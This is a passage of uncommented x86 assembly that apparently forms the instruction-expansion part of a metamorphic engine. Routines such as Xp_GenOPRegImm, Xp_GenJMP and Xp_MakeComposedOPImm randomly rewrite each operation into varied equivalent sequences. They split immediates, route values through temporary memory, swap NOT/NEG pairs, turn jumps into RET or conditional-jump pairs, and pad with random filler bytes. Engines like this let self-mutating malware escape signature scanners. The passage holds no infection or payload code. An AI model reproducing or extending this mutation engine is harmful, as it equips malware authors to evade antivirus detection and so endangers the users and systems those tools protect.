mov eax, [ebp+Xp_FlagRegOrMem]
push eax
xor eax, eax
mov [ebp+Xp_FlagRegOrMem], eax
call Xp_MakeComposedOPImm
pop ebx
mov [ebp+Xp_FlagRegOrMem], ebx
or eax, eax
jnz @@Double_OP_Normal
jmp Xp_DecreaseRecurseLevel
@@Double_MOV:
call Random
and eax, 1
jz @@Double_OP
mov eax, [ebp+Xp_8Bits]
or eax, eax
jnz @@Double_OP
call Xp_GenPUSHImm
call Xp_GenPOPReg
jmp Xp_DecreaseRecurseLevel
@@Double_CMP:
call Random
and eax, 1
jz @@Double_OP
mov edx, 38h+4
mov ecx, 28h+4
jmp @@Double_OP_CMPTEST_Common
@@Double_TEST:
call Random
and eax, 1
jz @@Double_OP
mov edx, 48h+4
mov ecx, 20h+4
@@Double_OP_CMPTEST_Common:
call Xp_SaveOperation
push edx
push ecx
call Xp_GetTempVar
mov eax, 40h
mov [ebp+Xp_Operation], eax
call Xp_GenOPMemReg
pop ecx
pop edx
call Random
and eax, 1
jz @@Double_OP_CMPTEST_Next
mov edx, ecx
@@Double_OP_CMPTEST_Next:
add edx, [ebp+Xp_8Bits]
mov [edi], edx
call Xp_CopyMemoryReference
mov eax, [ebp+Xp_Immediate]
mov [edi+7], eax
add edi, 10h
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single: mov eax, [ebp+Xp_Operation]
cmp eax, 40h
jz @@Single_MOV
cmp eax, 38h
jz @@Single_CMP
cmp eax, 30h
jz @@Single_XOR
or eax, eax
jz @@Single_ADD
@@Single_OP: mov eax, [ebp+Xp_Operation]
add eax, [ebp+Xp_8Bits]
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+1], eax
mov eax, [ebp+Xp_Immediate]
mov [edi+7], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
@@Single_MOV:
mov eax, [ebp+Xp_Immediate]
or eax, eax
jz @@Single_MOV_0
@@Single_OP_MOV:
call Random
and eax, 3
or eax, eax
jnz @@Single_OP
mov eax, [ebp+Xp_8Bits]
or eax, eax
jnz @@Single_OP
mov eax, 000808FCh
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+7], eax
mov eax, [ebp+Xp_Immediate]
mov [edi+3], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
@@Single_MOV_0:
call Random
and eax, 3
or eax, eax
jz @@Single_OP_MOV
cmp eax, 1
jz @@Single_MOV_0_XOR
cmp eax, 2
jz @@Single_MOV_0_SUB
@@Single_MOV_0_AND:
call Xp_SaveOperation
mov eax, 20h
mov [ebp+Xp_Operation], eax
call Xp_GenOPRegImm
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single_MOV_0_XOR:
add eax, 9
@@Single_MOV_0_SUB:
add eax, 26h
mov ecx, eax
call Xp_SaveOperation
mov [ebp+Xp_Operation], ecx
mov eax, [ebp+Xp_Register]
mov [ebp+Xp_SrcRegister], eax
call Xp_GenOPRegReg
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single_CMP:
mov eax, [ebp+Xp_Immediate]
or eax, eax
jnz @@Single_OP
call Random
and eax, 3
or eax, eax
jz @@Single_OP
cmp eax, 1
jz @@Single_CMP_OR
cmp eax, 2
jz @@Single_CMP_AND
@@Single_CMP_TEST:
add eax, 27h
@@Single_CMP_AND:
add eax, 17h
@@Single_CMP_OR:
add eax, 8
add eax, [ebp+Xp_8Bits]
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+1], eax
mov [edi+7], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
@@Single_XOR:
mov eax, [ebp+Xp_Immediate]
cmp eax, -1
jnz @@Single_OP
call Random
and eax, 1
jz @@Single_OP
call Xp_GenNOTReg
jmp Xp_DecreaseRecurseLevel
@@Single_ADD:
mov eax, [ebp+Xp_Immediate]
cmp eax, 1
jz @@Single_ADD_NOTNEG
cmp eax, -1
jz @@Single_ADD_NEGNOT
@@Single_OP_ADD:
call Random
and eax, 1
jz @@Single_OP
mov eax, [ebp+Xp_8Bits]
or eax, eax
jnz @@Single_OP
mov eax, 0FCh
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+1], eax
mov [edi+7], eax
mov eax, 8
mov [edi+2], eax
mov eax, [ebp+Xp_Immediate]
mov [edi+3], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
@@Single_ADD_NOTNEG:
call Random
and eax, 1
jz @@Single_ADD_INC
call Random
and eax, 1
jz @@Single_OP_ADD
call Xp_GenNOTReg
call Xp_GenNEGReg
jmp Xp_DecreaseRecurseLevel
@@Single_ADD_INC:
xor ebx, ebx
@@Single_ADD_INCDEC_Common:
mov eax, [ebp+Xp_8Bits]
add eax, 4Eh
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+1], eax
mov [edi+7], ebx
add edi, 10h
jmp Xp_DecreaseRecurseLevel
@@Single_ADD_NEGNOT:
call Random
and eax, 1
jz @@Single_ADD_DEC
call Random
and eax, 1
jz @@Single_OP_ADD
call Xp_GenNEGReg
call Xp_GenNOTReg
jmp Xp_DecreaseRecurseLevel
@@Single_ADD_DEC:
mov ebx, 8
jmp @@Single_ADD_INCDEC_Common
Xp_GenOPRegImm endp
Xp_GenOPMemReg proc
@@Start: call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 7
or eax, eax
jnz @@Single
call Random
@@Multiple: mov eax, [ebp+Xp_8Bits]
or eax, eax
jnz @@Single
mov eax, [ebp+Xp_Operation]
cmp eax, 40h
jz @@Multiple_MOV
@@Multiple_OP:
call Xp_SaveOperation
call Xp_GenPUSHMem
call Xp_GetTempVar
call Xp_GenPOPMem
mov eax, [ebp+Xp_Operation]
cmp eax, 38h
jz @@Multiple_OP_CMP
cmp eax, 48h
jz @@Multiple_OP_TEST
@@Multiple_OP_Common:
call Xp_GenOPMemReg
call Xp_GenPUSHMem
call Xp_RestoreOperation
call Xp_GenPOPMem
jmp Xp_DecreaseRecurseLevel
@@Multiple_OP_CMP:
mov ecx, 3Bh
mov edx, 2Bh
jmp @@Multiple_OP_CMPTEST_Common
@@Multiple_OP_TEST:
mov ecx, 23h
mov edx, 4Bh
@@Multiple_OP_CMPTEST_Common:
call Random
and eax, 1
jz @@Multiple_OP_CMPTEST_Next
mov edx, ecx
@@Multiple_OP_CMPTEST_Next:
add edx, [ebp+Xp_8Bits]
mov [edi], edx
call Xp_CopyMemoryReference
mov eax, [ebp+Xp_Register]
mov [edi+7], eax
add edi, 10h
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Multiple_MOV:
@@Multiple_MOV_Other:
call Random
and eax, 3
or eax, eax
jz @@Multiple_OP
cmp eax, 1
jz @@Multiple_MOV_1
cmp eax, 2
jnz @@Multiple_MOV_Other
@@Multiple_MOV_2:
call Xp_GenPUSHReg
call Xp_GenPOPMem
jmp Xp_DecreaseRecurseLevel
@@Multiple_MOV_1:
call Xp_SaveOperation
call Xp_GetTempVar
jmp @@Multiple_OP_Common
@@Single: mov eax, [ebp+Xp_Operation]
add eax, [ebp+Xp_8Bits]
add eax, 3
mov [edi], eax
call Xp_CopyMemoryReference
mov eax, [ebp+Xp_Register]
mov [edi+7], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenOPMemReg endp
Xp_GenOPRegMem proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 3
or eax, eax
jnz @@Single
@@Multiple: mov eax, [ebp+Xp_8Bits]
or eax, eax
jnz @@Single
mov eax, [ebp+Xp_Operation]
cmp eax, 40h
jz @@Multiple_MOV
@@Multiple_OP:
call Random
and eax, 1
jz @@Single
call Xp_SaveOperation
call Xp_GenPUSHMem
call Xp_GetTempVar
call Xp_GenPOPMem
call Xp_GenOPRegMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Multiple_MOV:
call Random
and eax, 1
jz @@Multiple_OP
call Xp_GenPUSHMem
call Xp_GenPOPReg
jmp Xp_DecreaseRecurseLevel
@@Single: mov eax, [ebp+Xp_Operation]
add eax, [ebp+Xp_8Bits]
add eax, 2
mov [edi], eax
call Xp_CopyMemoryReference
mov eax, [ebp+Xp_Register]
mov [edi+7], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenOPRegMem endp
Xp_GenOPMemImm proc
@@Start: call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 1
jz @@Single
call Random
and eax, 3
or eax, eax
jnz @@Double
@@Triple: mov eax, [ebp+Xp_8Bits]
or eax, eax
jnz @@Double
call Xp_GenPUSHMem
call Xp_SaveOperation
call Xp_GetTempVar
call Xp_GenPOPMem
mov eax, [ebp+Xp_Operation]
cmp eax, 38h
jz @@Triple_CMP
cmp eax, 48h
jz @@Triple_TEST
call Xp_GenOPMemImm
call Xp_GenPUSHMem
call Xp_RestoreOperation
call Xp_GenPOPMem
jmp Xp_DecreaseRecurseLevel
@@Triple_CMP:
mov ecx, 2Ch
mov edx, 3Ch
jmp @@Triple_CMPTEST_Common
@@Triple_TEST:
mov ecx, 24h
mov edx, 4Ch
@@Triple_CMPTEST_Common:
call Random
and eax, 1
jz @@Triple_CMPTEST_Next
mov edx, ecx
@@Triple_CMPTEST_Next:
add edx, [ebp+Xp_8Bits]
mov [edi], edx
call Xp_CopyMemoryReference
mov eax, [ebp+Xp_Immediate]
mov [edi+7], eax
add edi, 10h
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Double: mov eax, [ebp+Xp_Operation]
cmp eax, 40h
jz @@Double_MOV
or eax, eax
jz @@Double_ADD
cmp eax, 38h
jz @@Single
cmp eax, 48h
jz @@Single
@@Double_OP: mov eax, [ebp+Xp_FlagRegOrMem]
push eax
mov eax, 1
mov [ebp+Xp_FlagRegOrMem], eax
call Xp_MakeComposedOPImm
pop ebx
mov [ebp+Xp_FlagRegOrMem], ebx
or eax, eax
jnz @@Single
jmp Xp_DecreaseRecurseLevel
@@Double_MOV:
call Random
and eax, 1
jz @@Double_OP
mov eax, [ebp+Xp_8Bits]
or eax, eax
jnz @@Double_OP
call Xp_GenPUSHImm
call Xp_GenPOPMem
jmp Xp_DecreaseRecurseLevel
@@Double_ADD:
call Random
and eax, 1
jz @@Double_OP
mov eax, [ebp+Xp_Immediate]
cmp eax, 1
jz @@Double_ADD_NOTNEG
cmp eax, -1
jnz @@Double_OP
@@Double_ADD_NEGNOT:
call Xp_GenNEGMem
call Xp_GenNOTMem
jmp Xp_DecreaseRecurseLevel
@@Double_ADD_NOTNEG:
call Xp_GenNOTMem
call Xp_GenNEGMem
jmp Xp_DecreaseRecurseLevel
@@Single: mov eax, [ebp+Xp_Operation]
cmp eax, 30h
jz @@Single_XOR
or eax, eax
jz @@Single_ADD
@@Single_OP: mov eax, [ebp+Xp_Operation]
add eax, [ebp+Xp_8Bits]
add eax, 4
mov [edi], eax
call Xp_CopyMemoryReference
mov eax, [ebp+Xp_Immediate]
mov [edi+7], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
@@Single_XOR:
mov eax, [ebp+Xp_Immediate]
cmp eax, -1
jnz @@Single_OP
call Random
and eax, 1
jz @@Single_OP
call Xp_GenNOTMem
jmp Xp_DecreaseRecurseLevel
@@Single_ADD:
call Random
and eax, 1
jz @@Single_OP
mov eax, [ebp+Xp_Immediate]
cmp eax, 1
jz @@Single_INC
cmp eax, -1
jnz @@Single_OP
@@Single_DEC:
mov ebx, 8
@@Single_INCDEC_Common:
mov eax, [ebp+Xp_8Bits]
add eax, 4Fh
mov [edi], eax
push ebx
call Xp_CopyMemoryReference
pop ebx
mov [edi+7], ebx
add edi, 10h
jmp Xp_DecreaseRecurseLevel
@@Single_INC:
xor ebx, ebx
jmp @@Single_INCDEC_Common
Xp_GenOPMemImm endp
Xp_GenPOPReg proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 2
or eax, eax
jnz @@Single
@@Multiple: call Xp_SaveOperation
call Xp_GetTempVar
call Xp_GenPOPMem
mov eax, 40h
mov [ebp+Xp_Operation], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenOPRegMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single: mov eax, 58h
jmp Xp_GenPUSHReg_Common
Xp_GenPOPReg endp
Xp_GenPOPMem proc
call Xp_IncreaseRecurseLevel
@@Single: mov eax, 59h
jmp Xp_GenPUSHMem_Common
Xp_GenPOPMem endp
Xp_GenPUSHReg proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 2
or eax, eax
jnz @@Single
@@Multiple: call Xp_SaveOperation
call Xp_GetTempVar
mov eax, 40h
mov [ebp+Xp_Operation], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenOPMemReg
call Xp_GenPUSHMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single: mov eax, 50h
Xp_GenPUSHReg_Common:
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+1], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenPUSHReg endp
Xp_GenPUSHMem proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 3
or eax, eax
jnz @@Single
call Xp_SaveOperation
call Xp_GenPUSHMem
call Xp_GetTempVar
call Xp_GenPOPMem
call Xp_GenPUSHMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single: mov eax, 51h
Xp_GenPUSHMem_Common:
mov [edi], eax
call Xp_CopyMemoryReference
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenPUSHMem endp
Xp_GenPUSHImm proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 1
jz @@Single
@@Multiple: call Xp_SaveOperation
call Xp_GetTempVar
mov eax, 40h
mov [ebp+Xp_Operation], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenOPMemImm
call Xp_GenPUSHMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single: mov eax, 68h
mov [edi], eax
mov eax, [ebp+Xp_Immediate]
mov [edi+7], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenPUSHImm endp
Xp_GenNEGMem proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 3
or eax, eax
jnz @@Single
call Xp_GenNOTMem
call Xp_SaveOperation
mov eax, 1
jmp Xp_GenNOTMem_Common
@@Single: mov eax, [ebp+Xp_8Bits]
or eax, eax
jz @@NEG32
mov eax, 0E7h
jmp Xp_GenNOTMem_Common_Direct
@@NEG32: mov eax, 0E5h
jmp Xp_GenNOTMem_Common_Direct
Xp_GenNEGMem endp
Xp_GenNEGReg proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 3
or eax, eax
jnz @@Single
call Xp_GenNOTReg
call Xp_SaveOperation
mov eax, 1
jmp Xp_GenNOTReg_Common
@@Single: mov eax, [ebp+Xp_8Bits]
or eax, eax
jz @@NEG32
mov eax, 0E6h
jmp Xp_GenNOTReg_Common_Direct
@@NEG32: mov eax, 0E4h
jmp Xp_GenNOTReg_Common_Direct
Xp_GenNEGReg endp
Xp_GenNOTReg proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 2
or eax, eax
jnz @@Single
call Xp_GenNEGReg
call Xp_SaveOperation
mov eax, -1
Xp_GenNOTReg_Common:
mov [ebp+Xp_Immediate], eax
xor eax, eax
mov [ebp+Xp_Operation], eax
call Xp_GenOPRegImm
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single: mov eax, [ebp+Xp_8Bits]
or eax, eax
jz @@NOT32
mov eax, 0E2h
jmp @@NOT_
@@NOT32: mov eax, 0E0h
@@NOT_:
Xp_GenNOTReg_Common_Direct:
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+1], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenNOTReg endp
Xp_GenNOTMem proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 3
or eax, eax
jnz @@Single
call Xp_GenNEGMem
call Xp_SaveOperation
mov eax, -1
Xp_GenNOTMem_Common:
mov [ebp+Xp_Immediate], eax
xor eax, eax
mov [ebp+Xp_Operation], eax
call Xp_GenOPMemImm
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single: mov eax, [ebp+Xp_8Bits]
or eax, eax
jz @@NOT32
mov eax, 0E3h
jmp @@NOT_
@@NOT32: mov eax, 0E1h
@@NOT_:
Xp_GenNOTMem_Common_Direct:
mov [edi], eax
call Xp_CopyMemoryReference
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenNOTMem endp
Xp_GenCALLReg proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 2
or eax, eax
jnz @@Single
call Xp_SaveOperation
call Xp_GetTempVar
mov eax, 40h
mov [ebp+Xp_Operation], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenOPMemReg
call Xp_GenCALLMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single: mov eax, 0ECh
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+1], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenCALLReg endp
Xp_GenCALLMem proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 1
jnz @@Single
@@Multiple: call Random
and eax, 1
jz @@Multiple_Reg
call Xp_SaveOperation
call Xp_GenPUSHMem
call Xp_GetTempVar
call Xp_GenPOPMem
call Xp_GenCALLMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Multiple_Reg:
call Xp_SaveOperation
@@Multiple_Reg_Again:
call Random
and eax, 3
cmp eax, 3
jz @@Multiple_Reg_Again
mov [ebp+Xp_Register], eax
mov eax, 40h
mov [ebp+Xp_Operation], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenOPRegMem
call Xp_GenCALLReg
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single: mov eax, 0EAh
Xp_GenCALLMem_Common:
mov [edi], eax
call Xp_CopyMemoryReference
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenCALLMem endp
Xp_GenRET proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 3
or eax, eax
jnz @@Single
call Xp_SaveOperation
call Xp_GetTempVar
call Xp_GenPOPMem
call Xp_GenJMPMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single: mov eax, 0FEh
mov [edi], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenRET endp
Xp_GenJMP proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
mov eax, [ebp+AddressOfLastInstruction]
sub eax, 10h
cmp eax, esi
jz @@Single
call Random
and eax, 3
or eax, eax
jnz @@Single
@@Double_Other:
call Random
and eax, 3
or eax, eax
jz @@Double_Other
cmp eax, 1
jz @@Double_JccJcc
cmp eax, 2
jz @@Double_CMPJcc
mov edx, 73h
mov ecx, 76h
@@Double_JccJcc2:
call Random
or eax, eax
jz @@Double_JccJcc2_Next
mov edx, 75h
@@Double_JccJcc2_Next:
call Random
and eax, 1
jz @@Double_JccJcc2_Next02
mov eax, edx
mov edx, ecx
mov ecx, eax
@@Double_JccJcc2_Next02:
call Xp_SaveOperation
push ecx
mov [ebp+Xp_Operation], edx
call Xp_GenJcc_SingleJcc
pop ecx
mov [ebp+Xp_Operation], ecx
call Xp_GenJcc_SingleJcc
call Xp_RestoreOperation
jmp @@InsertStopMark
@@Double_CMPJcc:
call Xp_SaveOperation
mov eax, 38h
mov [ebp+Xp_Operation], eax
@@Double_CMPJcc_x:
call Random
and eax, 7
cmp eax, 4
jz @@Double_CMPJcc_x
mov [ebp+Xp_Register], eax
mov [ebp+Xp_SrcRegister], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenOPRegReg
call Xp_GetSpecialJcc
@@Double_CMPJcc_Common:
xor eax, 1
mov [ebp+Xp_Operation], eax
call Xp_GenJcc_SingleJcc
call Xp_RestoreOperation
jmp @@InsertStopMark
@@Double_JccJcc:
call Xp_SaveOperation
call Random
and eax, 0Fh
add eax, 70h
mov [ebp+Xp_Operation], eax
push eax
call Xp_GenJcc_SingleJcc
pop eax
jmp @@Double_CMPJcc_Common
@@Single: mov eax, 0E9h
mov [edi], eax
mov eax, [ebp+Xp_Immediate]
mov [edi+1], eax
add edi, 10h
Xp_EndJmp:
call Random
and eax, 2
or eax, eax
jnz Xp_DecreaseRecurseLevel
call Random
and eax, 7
add eax, 1
mov ecx, eax
@@LoopInsert:
call Random
mov al, 0FDh
mov [edi], eax
add edi, 10h
sub ecx, 1
or ecx, ecx
jnz @@LoopInsert
jmp Xp_DecreaseRecurseLevel
@@InsertStopMark:
call Random
and eax, 3
or eax, eax
jz @@InsertStopMark
cmp eax, 1
jz @@GenerateRET
cmp eax, 2
jz @@GenerateJMPMem
@@GenerateJMPReg:
call Xp_SaveOperation
call Random
and eax, 7
mov [ebp+Xp_Register], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenJMPReg
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@GenerateJMPMem:
call Xp_SaveOperation
call Xp_GetTempVar
call Xp_GenJMPMem
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@GenerateRET:
call Xp_GenRET
jmp Xp_DecreaseRecurseLevel
Xp_GenJMP endp
Xp_GenJMPReg proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 1
jz @@Single
call Random
and eax, 2
or eax, eax
jz @@Double_1
@@Double_0: call Xp_SaveOperation
call Xp_GetTempVar
mov eax, 40h
mov [ebp+Xp_Operation], eax
xor eax, eax
mov [ebp+Xp_8Bits], eax
call Xp_GenOPMemReg
call Xp_GenJMPMem
call Xp_RestoreOperation
jmp Xp_EndJmp
@@Double_1: call Xp_GenPUSHReg
call Xp_GenRET
jmp Xp_EndJmp
@@Single: mov eax, 0EDh
mov [edi], eax
mov eax, [ebp+Xp_Register]
mov [edi+1], eax
add edi, 10h
jmp Xp_EndJmp
Xp_GenJMPReg endp
Xp_GenJMPMem proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 3
or eax, eax
jnz @@Single
call Xp_SaveOperation
call Xp_GenPUSHMem
call Xp_GetTempVar
call Xp_GenPOPMem
call Xp_GenJMPMem
call Xp_RestoreOperation
jmp Xp_EndJmp
@@Single: mov eax, 0EBh
mov [edi], eax
call Xp_CopyMemoryReference
add edi, 10h
jmp Xp_EndJmp
Xp_GenJMPMem endp
Xp_GenMOVZX proc
call Xp_IncreaseRecurseLevel
cmp eax, 3
jae @@Single
call Random
and eax, 1
jz @@Single
call Random
and eax, 1
jz @@Double_1
@@Double_2:
xor eax, eax
mov [ebp+Xp_8Bits], eax
mov eax, 40h
mov [ebp+Xp_Operation], eax
call Xp_GenOPRegMem
xor eax, eax
mov [ebp+Xp_8Bits], eax
mov eax, 20h
mov [ebp+Xp_Operation], eax
mov eax, 0FFh
mov [ebp+Xp_Immediate], eax
call Xp_GenOPRegImm
jmp Xp_DecreaseRecurseLevel
@@Double_1:
mov eax, [ebp+Register8Bits]
call Xpand_TranslateRegister
mov ebx, [ebp+Xp_Register]
cmp eax, ebx
jnz @@Double_2
mov eax, 40h
mov [ebp+Xp_Operation], eax
xor eax, eax
mov [ebp+Xp_Immediate], eax
mov [ebp+Xp_8Bits], eax
call Xp_GenOPRegImm
mov eax, 80h
mov [ebp+Xp_8Bits], eax
call Xp_GenOPRegMem
jmp Xp_DecreaseRecurseLevel
@@Single:
mov eax, 0F8h
mov [edi], eax
call Xp_CopyMemoryReference
mov eax, [ebp+Xp_Register]
mov [edi+7], eax
add edi, 10h
jmp Xp_DecreaseRecurseLevel
Xp_GenMOVZX endp
Xp_GenJcc proc
call Xp_IncreaseRecurseLevel
cmp eax, 2
jae @@Single
call Random
and eax, 3
or eax, eax
jnz @@Single
@@Double: call Random
and eax, 0Fh
or eax, eax
jnz @@Double2
mov eax, 1
mov [edi+7], eax
call @@InternalSingle2
jmp Xp_DecreaseRecurseLevel
@@Double2: mov eax, [ebp+Xp_Operation]
cmp eax, 73h
jz @@Double_JAE
cmp eax, 75h
jz @@Double_JNZ
cmp eax, 76h
jnz @@Single
@@Double_JBE:
mov ebx, 72h
mov ecx, 74h
mov edx, 76h
jmp @@Double_GarbleAndSelect
@@Double_JNZ:
mov ebx, 72h
mov ecx, 75h
mov edx, 77h
jmp @@Double_GarbleAndSelect
@@Double_JAE:
mov ebx, 73h
mov ecx, 74h
mov edx, 77h
@@Double_GarbleAndSelect:
call Xp_GarbleRegisters
call Xp_SaveOperation
push ecx
mov [ebp+Xp_Operation], edx
call @@InternalSingle
pop ecx
mov [ebp+Xp_Operation], ecx
call @@InternalSingle
jmp Xp_RestoreOpAndDecreaseRecurseLevel
@@Single: call @@InternalSingle
jmp Xp_DecreaseRecurseLevel
Xp_GenJcc_SingleJcc:
@@InternalSingle:
xor eax, eax
mov [edi+7], eax
@@InternalSingle2:
mov eax, [ebp+Xp_Operation]
mov [edi], eax
mov eax, [ebp+Xp_Immediate]
mov [edi+1], eax
add edi, 10h
ret
Xp_GenJcc endp
Xp_GarbleRegisters proc
call Random
and eax, 3
or eax, eax
jz Xp_GarbleRegisters
cmp eax, 1
jz @@Permutation0
cmp eax, 2
jz @@Permutation1
@@Permutation2:
mov eax, ebx
mov ebx, edx
mov edx, eax
jmp @@Permutation0
@@Permutation1:
mov eax, ebx
mov ebx, ecx
mov ecx, eax
@@Permutation0:
call Random
and eax, 1
jz @@Return
@@Permutation0_0:
mov eax, edx
mov edx, ecx
mov ecx, eax
@@Return: ret
Xp_GarbleRegisters endp
Xp_MakeComposedOPImm proc
call Xp_SaveOperation
call Random
mov ebx, eax
mov edx, [ebp+Xp_Immediate]
mov eax, [ebp+Xp_Operation]
or eax, eax
jz @@Double_OP_ADD
cmp eax, 8
jz @@Double_OP_OR
cmp eax, 20h
jz @@Double_OP_AND
cmp eax, 30h
jz @@Double_OP_XOR
cmp eax, 40h
jnz @@Return_Error
@@Double_OP_MOV:
call Random
and eax, 7
or eax, eax
jz @@Double_OP_MOV_ADD
cmp eax, 1
jz @@Double_OP_MOV_OR
cmp eax, 2
jz @@Double_OP_MOV_AND
cmp eax, 3
jz @@Double_OP_MOV_XOR
cmp eax, 4
jnz @@Double_OP_MOV
@@Double_OP_MOV_MOV:
mov eax, [ebp+Xp_FlagRegOrMem]
or eax, eax
jz @@Double_OP_MOV_MOV_MakeReg
call Xp_GenOPMemImm
jmp @@Return_NoError
@@Double_OP_MOV_MOV_MakeReg:
call Xp_GenOPRegImm
jmp @@Return_NoError
@@Double_OP_MOV_ADD:
sub edx, ebx
xor ecx, ecx
jmp @@Double_OP_MOV_OP
@@Double_OP_MOV_OR:
and ebx, edx
call Random
and eax, edx
xor edx, ebx
or edx, eax
mov ecx, 8
jmp @@Double_OP_MOV_OP
@@Double_OP_MOV_AND:
call Random
and eax, 1
jz @@Double_OP_MOV_AND_2
call Random
not ebx
and eax, ebx
not ebx
mov ecx, eax
or ecx, edx
or edx, ebx
mov ebx, ecx
mov ecx, 20h
jmp @@Double_OP_MOV_OP
@@Double_OP_MOV_AND_2:
mov ecx, ebx
not ecx
or ecx, edx
or edx, ebx
mov ebx, ecx
mov ecx, 20h
jmp @@Double_OP_MOV_OP
@@Double_OP_MOV_XOR:
xor edx, ebx
mov ecx, 30h
@@Double_OP_MOV_OP:
push ecx
push edx
mov eax, 40h
mov [ebp+Xp_Operation], eax
mov [ebp+Xp_Immediate], ebx
mov eax, [ebp+Xp_FlagRegOrMem]
or eax, eax
jz @@Double_OP_MOV_OP_MakeReg
call Xp_GenOPMemImm
pop edx
pop ecx
mov [ebp+Xp_Operation], ecx
mov [ebp+Xp_Immediate], edx
call Xp_GenOPMemImm
jmp @@Return_NoError
@@Double_OP_MOV_OP_MakeReg:
call Xp_GenOPRegImm
pop edx
pop ecx
mov [ebp+Xp_Operation], ecx
mov [ebp+Xp_Immediate], edx
call Xp_GenOPRegImm
jmp @@Return_NoError
@@Double_OP_ADD:
sub edx, ebx
jmp @@Double_OP_OP
@@Double_OP_OR:
and ebx, edx
mov ecx, edx
xor edx, ebx
call Random
and ecx, eax
or edx, ecx
jmp @@Double_OP_OP
@@Double_OP_AND:
mov ecx, ebx
or ebx, edx
not ecx
or edx, ecx
jmp @@Double_OP_OP
@@Double_OP_XOR:
xor edx, ebx
@@Double_OP_OP:
push edx
mov [ebp+Xp_Immediate], ebx
mov eax, [ebp+Xp_FlagRegOrMem]
or eax, eax
jz @@Double_OP_OP_MakeReg
call Xp_GenOPMemImm
pop edx
mov [ebp+Xp_Immediate], edx
call Xp_GenOPMemImm
jmp @@Return_NoError
@@Double_OP_OP_MakeReg:
call Xp_GenOPRegImm
pop edx
mov [ebp+Xp_Immediate], edx
call Xp_GenOPRegImm
@@Return_NoError:
call Xp_RestoreOperation
xor eax, eax
ret
@@Return_Error:
call Xp_RestoreOperation
mov eax, 1
ret
Xp_MakeComposedOPImm endp
Xp_MakeSET_WEIGHT proc
call Xp_SaveOperation
mov eax, [ebp+Xp_SrcRegister]
mov [ebp+Xp_Register], eax
call Xp_GenPUSHReg
mov eax, 40h
mov [ebp+Xp_Operation], eax
call Xp_GenOPRegImm
call Xp_RestoreOperation
mov eax, [ebp+Xp_Immediate]
or eax, eax
@@SetWeight:
mov [ebp+Xp_Immediate], eax
